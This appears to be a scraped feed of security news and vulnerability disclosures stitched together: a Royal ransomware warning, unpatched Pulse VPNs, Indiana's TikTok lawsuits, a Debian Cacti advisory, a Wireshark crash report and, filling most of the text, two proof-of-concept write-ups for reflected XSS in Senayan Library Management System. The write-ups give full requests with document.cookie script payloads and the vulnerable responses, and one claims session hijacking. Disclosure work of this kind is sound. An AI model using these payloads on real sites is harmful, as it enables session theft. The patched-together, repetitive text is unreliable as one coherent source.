The U.S. Department of Health and Human Services (HHS) has cautioned of ongoing Royal ransomware attacks targeting healthcare entities in the country.
"While most of the known ransomware operators have performed Ransomware-as-a-Service, Royal appears to be a private group without any affiliates while maintaining financial motivation as their goal," the agency's Health Sector Cybersecurity

Healthcare IT / Ransomware

The U.S. Department of Health and Human Services (HHS) has cautioned of ongoing Royal ransomware attacks targeting healthcare entities in the country.

"While most of the known ransomware operators have performed Ransomware-as-a-Service, Royal appears to be a private group without any affiliates while maintaining financial motivation as their goal," the agency's Health Sector Cybersecurity Coordination Center (HC3) said \[PDF\].

"The group does claim to steal data for double-extortion attacks, where they will also exfiltrate sensitive data."

Royal ransomware, per Fortinet FortiGuard Labs, is said to be active since at least the start of 2022. The malware is a 64-bit Windows executable written in C++ and is launched via the command line, indicating that it involves a human operator to trigger the infection after obtaining access to a targeted environment.

Besides deleting volume shadow copies on the system, Royal utilizes the OpenSSL cryptographic library to encrypt files to the AES standard and appends them with a ".royal" extension.

Last month, Microsoft disclosed that a group it's tracking under the name DEV-0569 has been observed deploying the ransomware family through a variety of methods.

This includes malicious links delivered to victims by means of malicious ads, fake forum pages, blog comments, or through phishing emails that lead to rogue installer files for legitimate apps like Microsoft Teams or Zoom.

The files are known to harbor a malware downloader dubbed BATLOADER, which is then used to deliver a wide variety of payloads such as Gozi, Vidar, BumbleBee, in addition to abusing genuine remote management tools like Syncro to deploy Cobalt Strike for subsequent ransomware deployment.

The ransomware gang, despite its emergence only this year, is believed to comprise experienced actors from other operations, indicative of the ever-evolving nature of the threat landscape.

"Originally, the ransomware operation used BlackCat's encryptor, but eventually started using Zeon, which generated a ransomware note that was identified as being similar to Conti's," the HHS said. "This note was later changed to Royal in September 2022."

The agency further noted that Royal ransomware attacks on healthcare have primarily focused on organizations in the U.S., with payment demands ranging from $250,000 to $2 million.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Royal Ransomware Threat Takes Aim at U.S. Healthcare System

Pulse Connect VPN server software received several updates over the years, and thousands of hosts haven't patched.

Nearly 4,500 Pulse Connect Security SSL virtual private network hosts are running unpatched server software, leaving them open to cyberattacks.

A new analysis from Censys of the Pulse Connect Secure VPN ecosystem of 30,266 hosts found that although several notable flaws have been discovered and patched over the past few years, 4,460 hosts are still running vulnerable versions. Besides Pulse advisories, the Cybersecurity and Infrastructure Security Agency in April 2021 issued an alert that some of the documented Pulse Connect bugs were under active attack, Censys added.

The Censys Pulse Connect report includes a breakdown of the unpatched versions, finding the biggest chunk of vulnerable hosts — 1,033 — is in the US.

Overall, Censys said the team was trying to "... paint a picture of the current state of vulnerable Pulse Connect secure devices that are still running on the Internet," the report added.

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

Nearly 4,500 Pulse Connect Secure VPNs Left Unpatched and Vulnerable

Categories: News
Tags: TikTok

Tags:  ban TikTok

Tags:  states that banned TikTok

Tags:  Indiana bans TikTok

Tags:  Maryland bans TikTok

Tags:  Shou Zi Chew

Tags:  Brendan Carr

Tags:  ByteDance

Tags:  Brooke Oberwetter

The State of Indiana has filed two lawsuits against TikTok, Inc, the company behind the same name app, and its parent company, ByteDance.



(Read more...)




The post Indiana sues TikTok, describes it as "Chinese Trojan Horse" appeared first on Malwarebytes Labs.

Posted: December 12, 2022 by

On Wednesday, the State of Indiana filed two lawsuits against TikTok, Inc, the company behind the same name app, and its parent company, ByteDance.

The first suit alleges TikTok's 12+ rating on the Apple App Store and a "T" for "Teen" rating in the Google Play Store and the Microsoft Store are misleading as minors are repeatedly exposed to inappropriate content generated by the app's algorithm. 

The second suit claims that TikTok violated consumer protection laws by not disclosing that China has access to sensitive user data.

"TikTok is a wolf in sheep's clothing," court documents read, echoing what Federal Communications Commission (FCC) Chairman Brendan Carr said about TikTok back in July.

"As long as TikTok is permitted to deceive and mislead Indiana consumers about the risks to their data, those consumers and their privacy are easy prey."

TikTok declined to comment on the lawsuits; however, its spokesperson, Brooke Oberwetter, was quoted by The New York Times saying, "the safety, privacy, and security of our community is our top priority." Oberwetter added:

> “We build youth well-being into our policies, limit features by age, empower parents with tools and resources, and continue to invest in new ways to enjoy content based on age-appropriateness or family comfort."

When TikTok CEO Shou Zi Chew attempted to assuage critics by pointing out that US data are hosted on servers managed and controlled by Oracle, an American company, and disputing claims that the Chinese government could access the data, the second suit stated that such statements are "false and misleading."

"In addition to TikTok's statements that some China-based employees may access unencrypted US user data, which includes Indiana consumers' data, TikTok's privacy policy permits TikTok to share information with ByteDance' or 'other affiliate of our corporate group,''" the suit claims. "ByteDance and any affiliates and their employees who are located in China or are Chinese citizens are subject to Chinese law and the oppressive Chinese regime, including but not limited to laws requiring cooperation with national intelligence institutions and cybersecurity regulators."

> Because ByteDance is subject to Chinese law, and TikTok’s privacy policy expressly permits TikTok to share data with ByteDance, TikTok’s statements that Chinese law does not apply to that data are false and misleading.

Banning TikTok is slowly becoming a trend among US states. On Tuesday, Outgoing Maryland Governor Larry Hogan issued a directive forbidding state employees from using several Chinese and Russian equipment and software, citing these present "an unacceptable level of security risk." These include TikTok, Huawei products, ZTE, Tencent products, Alibaba products, and Kaspersky.

**We don't just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

**RELATED ARTICLES**

Indiana sues TikTok, describes it as "Chinese Trojan Horse"

Debian Linux Security Advisory 5298-1 - Two security vulnerabilities have been discovered in Cacti, a web interface for graphing of monitoring systems, which could result in unauthenticated command injection or LDAP authentication bypass.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5298-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffDecember 09, 2022                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : cactiCVE ID         : CVE-2022-0730 CVE-2022-46169Debian Bug     : 1008693 1025648Two security vulnerabilities have been discovered in Cacti, a webinterface for graphing of monitoring systems, which could result inunauthenticated command injection or LDAP authentication bypass.For the stable distribution (bullseye), these problems have been fixed inversion 1.2.16+ds1-2+deb11u1.We recommend that you upgrade your cacti packages.For the detailed security status of cacti please refer toits security tracker page at:https://security-tracker.debian.org/tracker/cactiFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmOTiuUACgkQEMKTtsN8TjZelw/+IK8TVgkeBtodhDZpUpUlrBmGTZy/GQAGhCL7l5tVyDyrUySYlZWQg8dbKHJHTGBIxSmsqkK923y/ddZApQreteoAIPyY5VVZ8EmSa7k+tzIvEUkJKlqDEnBlavQth37WaDsB4OYRW+bWMnCrvMhBzMIuuJOIdPAA5nNyhSgGiwxjbrMtInXFavd9k+WO3FMoxD5Jdzc3BvFLH+NJJl4KP/E96WaHenOYonTkpu1ATEo2uqCA0jdWC1dWPtieLAvZvOKR9a8eieWLoKHn5GK9tsYN1VEqwPGdqLHe6vOmreUEqtnq86uNZ1RhYtv2uGWdRVs6jCUKUM8yM5qTBXHLqpaDVoOfHfRhQEI2anZlcFNuXXv3yEHOpWzanTlC7ncAbCF8kC0gzQ0nhb0AWehIwNsslxre8++FVjLlPHoppaaUlgwt3NFkq9ITs9MVohvp1RunSUig9/8Z9Im6U1o51rbbSWSjOGyFSNjljcoHJ1WOoVit/PIAyhIhU1gaUV2hqIc+owaWo+LV/zSC9Myv3IxhUGoryuozM+z2krXk+ywzMcVR3kWXyY2qqMmHRkljnYknchoSDJd0bthwQ5t0daGnzLoqeql8hwOveN7hVIDg5SCOnybgesjVQN9x8leb9OifmVOA7Gj3sYP9Czmh1kWqvNwM2KROo8tyDszsl78==mHv/-----END PGP SIGNATURE-----

Debian Security Advisory 5298-1

Senayan Library Management System version 9.0.0 suffers from a cross site scripting vulnerability.

## Title: Senayan Library Management System v9.0.0 a.k.a SLIMS 9Multiple XSS-Reflected vulnerabilities## Author: nu11secur1ty## Date: 12.09.2022## Vendor: https://slims.web.id/web/## Software: https://github.com/slims/slims9_bulian/releases/download/v9.0.0/slims9_bulian-9.0.0.zip## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.0.0## Description:The value of the keywords request parameter is copied into the valueof an HTML tag attribute which is encapsulated in double quotationmarks.The payload m8vzl"><script>alert(hello_vulnerability)</script>hidhcwas submitted in the keywords parameter.This input was echoed unmodified in the application's response.## STATUS: HIGH Vulnerability[+] Payload:```GETGET /slims9_bulian-9.0.0/index.php?search=search&keywords=m8vzl"><script>alert(document.cookie)</script>hidhcHTTP/1.1Host: pwnedhost.comAccept-Encoding: gzip, deflateAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107Safari/537.36Connection: closeCache-Control: max-age=0Cookie: SenayanMember=aoujjbpmorr1km0t1j9g5cnhjuUpgrade-Insecure-Requests: 1Referer: http://pwnedhost.com/slims9_bulian-9.0.0/index.php?search=search&keywords=wd4iuxeo08r8d72ubgugx0nc5fylp2k6o9l4h6ywnSec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"Sec-CH-UA-Platform: WindowsSec-CH-UA-Mobile: ?0Content-Length: 0```[+] Response:```HTTP/1HTTP/1.1 200 OKDate: Fri, 09 Dec 2022 06:23:20 GMTServer: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30X-Frame-Options: SAMEORIGINX-Powered-By: PHP/7.4.30Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheX-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/html; charset=UTF-8Content-Length: 29492<!DOCTYPE html><html><head>    <meta charset="utf-8">    <title>Open Source Library Management System | Senayan</title>    <meta name="viewport" content="width=device-width,initial-scale=1, shrink-to-fit=no">    <meta http-equiv="X-UA-Compatible" content="IE=edge">    <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>    <meta http-equiv="Pragma" content="no-cache"/>    <meta http-equiv="Cache-Control" content="no-store, no-cache,must-revalidate, post-check=0, pre-check=0"/>    <meta http-equiv="Expires" content="Sat, 26 Jul 1997 05:00:00 GMT"/>        <meta name="description" content="Open Source LibraryManagement System | Senayan">      <meta name="keywords" content="Open Source Library Management System">      <meta name="viewport" content="width=device-width,height=device-height, initial-scale=1">    <meta name="generator" content="SLiMS 9 (Bulian)">    <meta name="theme-color" content="#000">    <meta property="og:locale" content="en_US"/>    <meta property="og:type" content="book"/>    <meta property="og:title" content="Open Source Library ManagementSystem | Senayan"/>        <meta property="og:description" content="Open Source LibraryManagement System"/>      <meta property="og:url"content="//pwnedhost.com/slims9_bulian-9.0.0/index.php?search=search&keywords=m8vzl"><script>alert(document.cookie)</script>hidhc"/>```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.0.0)## Proof and Exploit:[href](https://streamable.com/ac60v3)## Time spent`01:00:00`

Senayan Library Management System 9.0.0 Cross Site Scripting

Senayan Library Management System version 9.4.0 suffers from a cross site scripting vulnerability.

## Title: Senayan Library Management System v9.4.0 a.k.a SLIMS 9XSS-Reflected- PHPSESSID Hijacking## Author: nu11secur1ty## Date: 12.08.2022## Vendor: https://slims.web.id/web/## Software: https://slims.web.id/web/news/rilis-9.4.0/## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.4.0## Description:The value of the `destination` request parameter is copied into thevalue of an HTML tag attribute which is encapsulated in doublequotation marks.The payload zbuip"><script>alert(hello_vulnerability)</script>jgoihbmmyglwas submitted in the destination parameter.This input was echoed unmodified in the application's response. Theattacker can hijack the session of some users of the system.## STATUS: HIGH Vulnerability[+] Payload:```GETGET /slims9_bulian-9.4.0/index.php?p=member&destination=zbuip%22%3e%3cscript%3ealert(document.cookie)%3c%2fscript%3ejgoihbmmygl&memberID=admin&memberPassWord=password&_csrf_token_645a83a41868941e4692aa31e7235f2=6a50886006f02202a6dac5cfa07bcbfb1e2a6e84&logMeIn=LoginHTTP/1.1Host: pwnedhost.comAccept-Encoding: gzip, deflateAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107Safari/537.36Connection: closeCache-Control: max-age=0Cookie: SenayanMember=82qkie4ai1alsk0gtbge7rc48mOrigin: http://pwnedhost.comUpgrade-Insecure-Requests: 1Referer: http://pwnedhost.com/slims9_bulian-9.4.0/index.php?p=memberSec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"Sec-CH-UA-Platform: WindowsSec-CH-UA-Mobile: ?0```[+] Response:```HTTP/1HTTP/1.1 200 OKDate: Thu, 08 Dec 2022 18:43:20 GMTServer: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30X-Frame-Options: SAMEORIGINX-Powered-By: PHP/7.4.30Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheX-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/html; charset=UTF-8Content-Length: 30590<!DOCTYPE html><html><head>    <meta charset="utf-8">    <title>Open Source Library Management System | Senayan</title>    <meta name="viewport" content="width=device-width,initial-scale=1, shrink-to-fit=no">    <meta http-equiv="X-UA-Compatible" content="IE=edge">    <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>    <meta http-equiv="Pragma" content="no-cache"/>    <meta http-equiv="Cache-Control" content="no-store, no-cache,must-revalidate, post-check=0, pre-check=0"/>    <meta http-equiv="Expires" content="Sat, 26 Jul 1997 05:00:00 GMT"/>    <meta name="robots" content="noindex, follow">        <metaname="description" content="Open Source Library Management System |Senayan">      <meta name="keywords" content="Open Source Library Management System">      <meta name="viewport" content="width=device-width,height=device-height, initial-scale=1">    <meta name="generator" content="SLiMS 9 (Bulian)">    <meta name="theme-color" content="#000">    <meta property="og:locale" content="en_US"/>    <meta property="og:type" content="book"/>    <meta property="og:title" content="Open Source Library ManagementSystem | Senayan"/>        <meta property="og:description" content="Open Source LibraryManagement System"/>      <meta property="og:url"content="//pwnedhost.com%2Fslims9_bulian-9.4.0%2Findex.php%3Fp%3Dmember%26destination%3Dzbuip%22%3Ealert%28document.cookie%29jgoihbmmygl%26memberID%3Dadmin%26memberPassWord%3Dpassword%26_csrf_token_645a83a41868941e4692aa31e7235f2%3D6a50886006f02202a6dac5cfa07bcbfb1e2a6e84%26logMeIn%3DLogin"/>    <meta property="og:site_name" content="Senayan"/>        <meta property="og:image"            content="//pwnedhost.com/slims9_bulian-9.4.0/template/default/img/logo.png"/>    <meta name="twitter:card" content="summary">    <meta name="twitter:url"content="//pwnedhost.com%2Fslims9_bulian-9.4.0%2Findex.php%3Fp%3Dmember%26destination%3Dzbuip%22%3Ealert%28document.cookie%29jgoihbmmygl%26memberID%3Dadmin%26memberPassWord%3Dpassword%26_csrf_token_645a83a41868941e4692aa31e7235f2%3D6a50886006f02202a6dac5cfa07bcbfb1e2a6e84%26logMeIn%3DLogin"/>    <meta name="twitter:title" content="Open Source Library ManagementSystem | Senayan"/>        <meta property="twitter:image"            content="//pwnedhost.com/slims9_bulian-9.4.0/template/default/img/logo.png"/>          <link rel="stylesheet" href="template/default/assets/css/bootstrap.min.css">        <link rel="stylesheet"href="template/default/assets/plugin/font-awesome/css/fontawesome-all.min.css">        <link rel="stylesheet" href="template/default/assets/css/tailwind.min.css">        <link rel="stylesheet"href="template/default/assets/plugin/vegas/vegas.min.css">    <link href="/slims9_bulian-9.4.0/js/toastr/toastr.min.css?31014320"rel="stylesheet" type="text/css"/>        <link rel="stylesheet" href="/slims9_bulian-9.4.0/js/colorbox/colorbox.css">        <link rel="stylesheet" href="template/default/assets/css/flag-icon.min.css">        <link rel="stylesheet"href="template/default/assets/css/style.css?v=20221209-014320">    <link rel="shortcut icon" href="webicon.ico" type="image/x-icon"/>        <script src="template/default/assets/js/vue.min.js"></script>        <script src="template/default/assets/js/jquery.min.js"></script>        <script src="template/default/assets/js/popper.min.js"></script>        <script src="template/default/assets/js/bootstrap.min.js"></script>        <script src="template/default/assets/plugin/vegas/vegas.min.js"></script>    <script src="/slims9_bulian-9.4.0/js/toastr/toastr.min.js"></script>        <script src="/slims9_bulian-9.4.0/js/colorbox/jquery.colorbox-min.js"></script>    <script src="/slims9_bulian-9.4.0/js/gui.js"></script>    <script src="/slims9_bulian-9.4.0/js/fancywebsocket.js"></script></head><body class="bg-grey-lightest">    <div class="result-search page-member-area">        <section id="section1 container-fluid">            <header class="c-header">                <div class="mask"></div><nav class="navbar navbar-expand-lg navbar-dark bg-transparent">    <a class="navbar-brand inline-flex items-center" href="index.php">                <svg            class="fill-current text-white inline-block h-8 w-8"            version="1.1"            xmlns="http://www.w3.org/2000/svg"xmlns:xlink="http://www.w3.org/1999/xlink"            viewBox="0 0 118.4 135" style="enable-background:new 0 0 118.4 135;"            xml:space="preserve">                <pathd="M118.3,98.3l0-62.3l0-0.2c-0.1-1.6-1-3-2.3-3.9c-0.1,0-0.1-0.1-0.2-0.1L61.9,0.8c-1.7-1-3.9-1-5.4-0.1l-54,31.1l-0.4,0.2C0.9,33,0.1,34.4,0,36c0,0.1,0,0.2,0,0.3l0,62.4l0,0.3c0.1,1.6,1,3,2.3,3.9c0.1,0.1,0.2,0.1,0.2,0.2l53.9,31.1l0.3,0.2c0.8,0.4,1.6,0.6,2.4,0.6c0.8,0,1.5-0.2,2.2-0.5l53.9-31.1c0.3-0.1,0.6-0.3,0.9-0.5c1.2-0.9,2-2.3,2.1-3.7c0-0.1,0-0.3,0-0.4                C118.4,98.6,118.3,98.5,118.3,98.3zM114.4,98.8c0,0.3-0.2,0.7-0.5,0.9c-0.1,0.1-0.2,0.1-0.2,0.1l-20.6,11.9L59.2,92.1l-33.9,19.6L4.6,99.7l0,0l0,0C4.2,99.5,4,99.2,4,98.8l0-62.5l0,0l0-0.1c0-0.4,0.2-0.7,0.5-0.9l20.8-12l33.9,19.6l33.9-19.6l20.6,11.9l0.1,0                c0.3,0.2,0.5,0.5,0.6,0.9l0,62.3L114.4,98.8L114.4,98.8zM95.3,68.6v39.4L23.1,66.4V26.9L95.3,68.6z"/>         </svg>                <div class="inline-flex flex-col leading-tight ml-2">            <h1 class="text-lg m-0 p-0">Senayan</h1>                    </div>    </a>    <button class="navbar-toggler" type="button"data-toggle="collapse" data-target="#navbarSupportedContent"            aria-controls="navbarSupportedContent"aria-expanded="false" aria-label="Toggle navigation">        <span class="navbar-toggler-icon"></span>    </button>    <div class="collapse navbar-collapse" id="navbarSupportedContent">        <ul class="navbar-nav ml-auto">          <li class="nav-item ">    <a class="nav-link" href="index.php">Home</a></li><li class="nav-item ">    <a class="nav-link" href="index.php?p=libinfo">Information</a></li><li class="nav-item ">    <a class="nav-link" href="index.php?p=news">News</a></li><li class="nav-item ">    <a class="nav-link" href="index.php?p=help">Help</a></li><li class="nav-item ">    <a class="nav-link" href="index.php?p=librarian">Librarian</a></li>                        <li class="nav-item active">                  <a class="nav-link" href="index.php?p=member">Member Area</a>              </li>                      <li class="nav-item dropdown">                              <a class="nav-link dropdown-togglecursor-pointer" type="button" id="languageMenuButton"                   data-toggle="dropdown" aria-haspopup="true"aria-expanded="false">                    <span class="flag-icon flag-icon-us"style="border-radius: 2px;"></span>                </a>                <div class="dropdown-menu bg-grey-lighterdropdown-menu-lg-right" aria-labelledby="dropdownMenuButton">                    <h6 class="dropdown-header">Select Language : </h6>                      <a class="dropdown-item"href="index.php?select_lang=ar_SA">        <span class="flag-icon flag-icon-sa mr-2"style="border-radius: 2px;"></span> Arabic    </a>    <a class="dropdown-item" href="index.php?select_lang=bn_BD">        <span class="flag-icon flag-icon-bd mr-2"style="border-radius: 2px;"></span> Bengali    </a>    <a class="dropdown-item" href="index.php?select_lang=pt_BR">        <span class="flag-icon flag-icon-br mr-2"style="border-radius: 2px;"></span> Brazilian Portuguese    </a>    <a class="dropdown-item" href="index.php?select_lang=en_US">        <span class="flag-icon flag-icon-us mr-2"style="border-radius: 2px;"></span> English    </a>    <a class="dropdown-item" href="index.php?select_lang=es_ES">        <span class="flag-icon flag-icon-es mr-2"style="border-radius: 2px;"></span> Espanol    </a>    <a class="dropdown-item" href="index.php?select_lang=de_DE">        <span class="flag-icon flag-icon-de mr-2"style="border-radius: 2px;"></span> German    </a>    <a class="dropdown-item" href="index.php?select_lang=id_ID">        <span class="flag-icon flag-icon-id mr-2"style="border-radius: 2px;"></span> Indonesian    </a>    <a class="dropdown-item" href="index.php?select_lang=ja_JP">        <span class="flag-icon flag-icon-jp mr-2"style="border-radius: 2px;"></span> Japanese    </a>    <a class="dropdown-item" href="index.php?select_lang=my_MY">        <span class="flag-icon flag-icon-my mr-2"style="border-radius: 2px;"></span> Malay    </a>    <a class="dropdown-item" href="index.php?select_lang=fa_IR">        <span class="flag-icon flag-icon-ir mr-2"style="border-radius: 2px;"></span> Persian    </a>    <a class="dropdown-item" href="index.php?select_lang=ru_RU">        <span class="flag-icon flag-icon-ru mr-2"style="border-radius: 2px;"></span> Russian    </a>    <a class="dropdown-item" href="index.php?select_lang=th_TH">        <span class="flag-icon flag-icon-th mr-2"style="border-radius: 2px;"></span> Thai    </a>    <a class="dropdown-item" href="index.php?select_lang=tr_TR">        <span class="flag-icon flag-icon-tr mr-2"style="border-radius: 2px;"></span> Turkish    </a>    <a class="dropdown-item" href="index.php?select_lang=ur_PK">        <span class="flag-icon flag-icon-pk mr-2"style="border-radius: 2px;"></span> Urdu    </a>                </div>            </li>        </ul>    </div></nav>            </header>          <div class="search" id="search-wraper"xmlns:v-bind="http://www.w3.org/1999/xhtml">    <div class="container">        <div class="row">            <div class="col-lg-8 mx-auto">                <div class="card border-0 shadow">                    <div class="card-body">                        <form class="" action="index.php" method="get"@submit.prevent="searchSubmit">                            <input type="hidden" name="search" value="search">                            <input ref="keywords" value=""v-model.trim="keywords"                                   @focus="searchOnFocus"@blur="searchOnBlur" type="text" id="search-input"                                   name="keywords"class="input-transparent w-100" autocomplete="off"                                   placeholder="Enter keyword tosearch collection..."/>                        </form>                    </div>                </div>                <transition name="slide-fade">                    <div v-if="show" class="advanced-wraper shadowmt-4" id="advanced-wraper"                         v-click-outside="hideSearch">                        <p class="label mb-2">                            Search by :                            <i@click="hideSearch"                               class="far fa-times-circle float-righttext-danger cursor-pointer"></i>                        </p>                        <div class="d-flex flex-wrap">                            <a v-bind:class="{'btn-primarytext-white': searchBy === 'keywords', 'btn-outline-secondary':searchBy !== 'keywords' }"                               @click="searchOnClick('keywords')"class="btn mr-2 mb-2">ALL</a>                            <a v-bind:class="{'btn-primarytext-white': searchBy === 'author', 'btn-outline-secondary': searchBy!== 'author' }"                               @click="searchOnClick('author')"class="btn mr-2 mb-2">Author</a>                            <a v-bind:class="{'btn-primarytext-white': searchBy === 'subject', 'btn-outline-secondary': searchBy!== 'subject' }"                               @click="searchOnClick('subject')"class="btn mr-2 mb-2">Subject</a>                            <a v-bind:class="{'btn-primarytext-white': searchBy === 'isbn', 'btn-outline-secondary': searchBy!== 'isbn' }"                               @click="searchOnClick('isbn')"class="btn mr-2 mb-2">ISBN/ISSN</a>                            <button class="btn btn-light mr-2 mb-2"disabled>OR TRY</button>                            <a class="btn btn-outline-primary mr-2mb-2" data-toggle="modal" data-target="#adv-modal">Advanced Search</a>                        </div>                        <p v-if="lastKeywords.length > 0" class="labelmt-4">Last search:</p>                        <a:href="`index.php?${tmpObj[k].searchBy}=${tmpObj[k].text}&search=search`"                           class="flex items-center justify-betweenpy-1 text-decoration-none text-grey-darkest hover:text-blue"                           v-for="k in lastKeywords" :key="k"><span><i                                        class="far fa-clocktext-grey-dark mr-2"></i><span class="italictext-sm">{{tmpObj[k].text}}</span></span><i                                    class="fas fa-angle-righttext-grey-dark"></i></a>                    </div>                </transition>            </div>        </div>    </div></div>        </section>        <div class="container py-4">          <div class="row">              <div class="col-md-8">                    <div>        <div class="tagline">Library Member Login</div>                <div class="loginInfo">Please insert your member IDand password given by library system administrator. If you arelibrary's member and don't have a password yet, please contact librarystaff.</div>        <div class="loginInfo">            <formaction="index.php?p=member&destination=zbuip"><script>alert(document.cookie)</script>jgoihbmmygl"method="post">                <div class="fieldLabel">Member ID</div>```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.4.0)## Proof and Exploit:[href](https://streamable.com/dsl863)## Time spent`01:30:00`

Senayan Library Management System 9.4.0 Cross Site Scripting

Crash in the USB HID protocol dissector in Wireshark 3.6.0 to 3.6.8 allows denial of service via packet injection or crafted capture file on Windows

Skip to content

Open Issue created Sep 27, 2022 by **myrdyr@myrdyr**

**Crash in USB-HID dissector on Windows**

**Summary**

When dissecting a PCAP with USB-HID data, a crash can happen if the string "Keyboard 5 and %" is loaded from https://gitlab.com/wireshark/wireshark/-/blob/master/epan/dissectors/packet-usb-hid.c#L827. On Windows, the spurious '%' is treated as a format string identifier and crashes further down the line.

**Steps to reproduce**

Using version 3.6.8 (64-bit) on Windows 10:

tshark.exe -V -r minimal.pcap

OR

wireshark.exe minimal.pcap

**What is the current bug behavior?**

Tshark parses the first 5 frames, but crashes silently before finishing to output the 5th frame. Frame 6 doesn't get printed. Wireshark will crash without any error message or error report.

**What is the expected correct behavior?**

Some weird, but somewhat valid, dissected USB-HID data. The example is minimized from a much larger file in order to reproduce. Wireshark should not crash.

**Sample capture file**

minimal.pcap

**Relevant logs and/or screenshots**

    gdb: unknown target exception 0xc0000409 at 0x7ffeee4a1208
    
    Thread 1 received signal ?, Unknown signal.
    0x00007ffeee4a1208 in ucrtbase!_invoke_watson () from Windows/System32/ucrtbase.dll
    (gdb) info stack
    #0  0x00007ffeee4a1208 in ucrtbase!_invoke_watson () from Windows/System32/ucrtbase.dll
    #1  0x00007ffeee4524b1 in ucrtbase!_invalid_parameter_noinfo () from Windows/System32/ucrtbase.dll
    #2  0x00007ffeee452379 in ucrtbase!_invalid_parameter_noinfo () from Windows/System32/ucrtbase.dll
    #3  0x00007ffeee4829fc in ucrtbase!.intrinsic_setjmpex () from Windows/System32/ucrtbase.dll
    #4  0x00007ffeee441b49 in ucrtbase!_wtol () from Windows/System32/ucrtbase.dll
    #5  0x00007ffeee442304 in ucrtbase!_wctomb_s_l () from Windows/System32/ucrtbase.dll
    #6  0x00007ffeee442ed1 in ucrtbase!.stdio_common_vsprintf_s () from Windows/System32/ucrtbase.dll
    #7  0x00007ffee9356c4b in wmem_strdup_vprintf () from Users/user/Downloads/WiresharkPortable64/App/Wireshark/libwsutil.dll
    #8  0x00007ffee9356bad in wmem_strdup_printf () from Users/user/Downloads/WiresharkPortable64/App/Wireshark/libwsutil.dll
    #9  0x00007ffe21146d33 in udp_dissect_pdus () from Users/user/Downloads/WiresharkPortable64/App/Wireshark/libwireshark.dll
    #10 0x00007ffe211484f2 in udp_dissect_pdus () from Users/user/Downloads/WiresharkPortable64/App/Wireshark/libwireshark.dll
    #11 0x00007ffe205d1546 in libwireshark!call_dissector_only () from Users/user/Downloads/WiresharkPortable64/App/Wireshark/libwireshark.dll
    #12 0x00007ffe205d1771 in libwireshark!call_dissector_with_data () from Users/user/Downloads/WiresharkPortable64/App/Wireshark/libwireshark.dll
    #13 0x00007ffe205d4c0d in libwireshark!dissector_try_uint_new () from Users/user/Downloads/WiresharkPortable64/App/Wireshark/libwireshark.dll
    #14 0x00007ffe211575fe in udp_dissect_pdus () from Users/user/Downloads/WiresharkPortable64/App/Wireshark/libwireshark.dll
    #15 0x00007ffe21154b2b in udp_dissect_pdus () from Users/user/Downloads/WiresharkPortable64/App/Wireshark/libwireshark.dll
    #16 0x00007ffe21152d89 in udp_dissect_pdus () from Users/user/Downloads/WiresharkPortable64/App/Wireshark/libwireshark.dll
    #17 0x00007ffe21151c2d in udp_dissect_pdus () from Users/user/Downloads/WiresharkPortable64/App/Wireshark/libwireshark.dll
    #18 0x00007ffe205d1546 in libwireshark!call_dissector_only () from Users/user/Downloads/WiresharkPortable64/App/Wireshark/libwireshark.dll
    #19 0x00007ffe205d1771 in libwireshark!call_dissector_with_data () from Users/user/Downloads/WiresharkPortable64/App/Wireshark/libwireshark.dll
    #20 0x00007ffe205d14b0 in libwireshark!call_dissector_only () from Users/user/Downloads/WiresharkPortable64/App/Wireshark/libwireshark.dll
    #21 0x00007ffe20a04d85 in libwireshark!dissect_e212_utf8_imsi () from Users/user/Downloads/WiresharkPortable64/App/Wireshark/libwireshark.dll
    #22 0x00007ffe205d1546 in libwireshark!call_dissector_only () from Users/user/Downloads/WiresharkPortable64/App/Wireshark/libwireshark.dll
    #23 0x00007ffe205d1771 in libwireshark!call_dissector_with_data () from Users/user/Downloads/WiresharkPortable64/App/Wireshark/libwireshark.dll
    #24 0x00007ffe205d14b0 in libwireshark!call_dissector_only () from Users/user/Downloads/WiresharkPortable64/App/Wireshark/libwireshark.dll
